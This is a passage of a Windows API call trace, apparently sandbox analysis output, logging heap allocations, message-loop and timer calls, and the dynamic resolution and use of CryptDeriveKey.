hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0150.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0150.947] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0150.947] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0150.947] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0150.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0150.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0150.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0150.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0150.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0150.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0150.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0151.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0151.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0151.123] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0151.123] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0151.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0151.123] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0151.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0151.124] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0151.124] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 1 [0151.136] TranslateMessage (lpMsg=0x8cef58) returned 0 [0151.136] DispatchMessageW (lpMsg=0x8cef58) returned 0x0 [0151.136] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0151.136] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0151.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0151.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0151.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0151.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0151.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0151.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0151.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0151.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0151.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0151.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0151.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0151.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0151.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0151.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0151.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e509e0 [0151.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e509e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.216] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0151.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0151.217] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa875d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87350) returned 1 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0151.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0151.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0151.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 